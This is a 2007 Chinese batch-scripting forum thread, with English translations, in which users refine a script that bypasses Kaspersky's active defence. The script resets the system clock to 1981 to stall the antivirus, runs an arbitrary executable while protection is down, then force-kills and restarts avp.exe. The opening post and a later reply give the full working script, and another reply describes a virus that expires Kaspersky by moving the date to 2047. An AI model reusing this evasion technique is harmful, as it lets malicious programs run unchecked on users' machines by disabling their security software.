|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『楼 主』:
绕过卡巴主动防御的批处理【新方法遇到疑问】
使用 LLM 解释/回答一下
网上有个饶过卡巴主动防御的批处理,但是每次恢复日期后卡巴不能一下子快速反映回来,会没响应一分钟左右。
我想到用结束进程再恢复的方法来让它快速反映。
但是写批处理遇上个莫名其妙的问题。
先帖上代码
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
问题是启动卡巴后无法执行后面的exit标号后的代码。
我郁闷的要死
请高人指点!!!!
Last edited by heicai on 2007-6-29 at 12:59 PM ]
There is an online batch script that bypasses the Kaspersky active defense, but every time the date is restored, Kaspersky can't quickly respond back and will be unresponsive for about one minute.
I thought of using the method of ending the process and then restoring to make it respond quickly.
But I encountered a strange problem when writing the batch script.
First, post the code
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
The problem is that after starting Kaspersky, the code after the exit label cannot be executed.
I'm really郁闷
Please help from the experts!!!!!
Last edited by heicai on 2007-6-29 at 12:59 PM ]
|
|
 2007-6-29 12:32 |
|
|
dikex
高级用户
潜水修练批处理
积分 788
发帖 366
注册 2006-12-31
状态 离线
|
『第 2 楼』:
使用 LLM 解释/回答一下
卡巴有驱动保护,taskkill命令是无法访问或者结束它的进程的,除非你的是绿色版之类的东西
Kaba has driver protection, and the taskkill command cannot access or end its process, unless it is a green version or something like that
|
正在潜水修练的批处理小白 |
|
|
2007-6-29 13:01 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 3 楼』:
使用 LLM 解释/回答一下
Originally posted by dikex at 2007-6-29 01:01 PM:
卡巴有驱动保护,taskkill命令是无法访问或者结束它的进程的,除非你的是绿色版之类的东西
把时间改成1981年,再改回来。
这时卡巴就完全瘫痪了。用taskkill命令可以杀死进程!
Originally posted by dikex at 2007-6-29 01:01 PM:
Kaspersky has driver protection, and the taskkill command cannot access or terminate its process, unless it is a portable version or something like that
Change the time to 1981 and then change it back.
At this time, Kaspersky is completely paralyzed. The taskkill command can kill the process!
|
|
|
2007-6-29 13:02 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
|
|
2007-6-29 13:36 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 5 楼』:
使用 LLM 解释/回答一下
Originally posted by HAT at 2007-6-29 01:36 PM:
把call改成start
乱说,这样连卡巴都启动不起来了。
Originally posted by HAT at 2007-6-29 01:36 PM:
Change call to start
Nonsense, this won't even start Kaspersky.
|
|
|
2007-6-29 13:39 |
|
|
dikex
高级用户
潜水修练批处理
积分 788
发帖 366
注册 2006-12-31
状态 离线
|
『第 6 楼』:
使用 LLM 解释/回答一下
注意用语
call调用后需要等待被调用的命令结束才会执行下一个命令的;
改为start可以,但如果路径有空格,直接改会出问题了;
start "" "路径" 参数
Pay attention to the wording.
After a call is made, it needs to wait for the called command to finish before executing the next command;
Changing it to start can work, but if there is a space in the path, directly changing it will cause problems;
start "" "path" parameter
|
正在潜水修练的批处理小白 |
|
|
2007-6-29 13:47 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第 7 楼』:
使用 LLM 解释/回答一下
%avpp%的环境变量内的路径是这样的"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
麻烦楼上的告诉我start %avpp%具体该怎么写
Last edited by heicai on 2007-6-29 at 01:55 PM ]
The path in the environment variable of %avpp% is like this "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Please tell me how to write start %avpp% specifically above
|
|
|
2007-6-29 13:53 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第 8 楼』:
使用 LLM 解释/回答一下
//乱说,这样连卡巴都启动不起来了。
要低调 要低调 ^_^
start命令是可以滴
//Nonsense, this won't even start Kaspersky.
Be low-key Be low-key ^_^
The start command is okay
|
|
|
2007-6-29 14:41 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第 9 楼』:
使用 LLM 解释/回答一下
try this one :)
@echo off
set app=C:\test 1\my test\aa.bat
start "" "%app%"
aa.bat
@echo off
echo 我的目录有这么多空格,还是可以被start执行嘿嘿
pause
我的目录有这么多空格,还是可以被start执行嘿嘿
Press any key to continue . . .
try this one :)
@echo off
set app=C:\test 1\my test\aa.bat
start "" "%app%"
aa.bat
@echo off
echo My directory has so many spaces, and it can still be executed by start heh heh
pause
My directory has so many spaces, and it can still be executed by start heh heh
Press any key to continue . . .
|
|
|
2007-6-29 14:47 |
|
|
gorke
初级用户
积分 51
发帖 21
注册 2007-6-27
状态 离线
|
『第 10 楼』:
使用 LLM 解释/回答一下
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
start "" %avpp%
goto exit
)
:exit
echo 结束
pause
换成这个就可以了~!
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
start "" %avpp%
goto exit
)
:exit
echo Done
pause
Changed to this~!
|
一直都很菜~!!! |
|
|
2007-6-30 21:37 |
|
|
wewe12
新手上路
积分 16
发帖 6
注册 2006-11-8
状态 离线
|
『第 11 楼』:
使用 LLM 解释/回答一下
还是不行啊,说什么没找到framedyn.dll,因此这个程序未能启动
Still not working. It says that framedyn.dll was not found, so this program failed to start
|
|
|
2007-6-30 22:40 |
|
|
koala
初级用户
Batchs上議院參議長
积分 199
发帖 105
注册 2007-6-5
来自 江苏
状态 离线
|
『第 12 楼』:
使用 LLM 解释/回答一下
你就知道 卡巴 没有考虑过你改时间的问题啊
省点时间抱抱猫,转转 论坛学习吧
You just know that Kaba hasn't considered the problem of you changing the time. Save some time, hug the cat, and browse the forum to study.
|
『生如夏花之绚烂
死若秋叶之静美』 dos做到了 |
|
|
2007-8-23 15:50 |
|
|
icyheart
中级用户
积分 216
发帖 81
注册 2007-8-6
状态 离线
|
『第 13 楼』:
使用 LLM 解释/回答一下
上次在网上见了一种病毒把时间一下改成2047年,卡巴斯基一下子就过期不能用啦这时它的自我保护功能就失效 啦,这时可以K掉它
Last time I saw a virus online that changed the time to 2047 at once, and then the Kaspersky expired and couldn't be used. At this time, its self-protection function failed. At this time, you can K it off.
|
|
|
2007-8-23 19:07 |
|
|
scriptor
银牌会员
积分 1187
发帖 555
注册 2006-12-21
状态 离线
|
『第 14 楼』:
使用 LLM 解释/回答一下
Originally posted by heicai at 2007-6-29 13:53:
%avpp%的环境变量内的路径是这样的"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
麻烦楼上的告诉我sta ...
来个全盘搜索
for %%a in (c d e f) do (
for /f %%b in ('dir /s %%a:\avp.exe') do set avp-%%a=%%~fb
)
然后调用avp-%%a
这个简单
我就不写了
Last edited by scriptor on 2007-8-24 at 03:23 AM ]
Originally posted by heicai at 2007-6-29 13:53:
The path in the environment variable of %avpp% is like this: "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Please tell the person above sta ...
Do a full disk search
for %%a in (c d e f) do (
for /f %%b in ('dir /s %%a:\avp.exe') do set avp-%%a=%%~fb
)
Then call avp-%%a
This is simple
I won't write it out
Last edited by scriptor on 2007-8-24 at 03:23 AM ]
|
|
|
2007-8-24 03:20 |
|
|
nforce1
初级用户
积分 128
发帖 16
注册 2007-1-26
状态 离线
|
『第 15 楼』:
使用 LLM 解释/回答一下
汗一个..研究这个.不会是想做病毒吧??
不过.也学习啦.呵呵
改系统时间真的可以把卡巴K掉啊?
要试验下了
Swe sweat.. studying this. Not going to make a virus, right??
But, also learned. Hehe
Changing the system time can really kill Kaspersky?
Gotta test it
|
|
|
2007-8-24 14:21 |
|
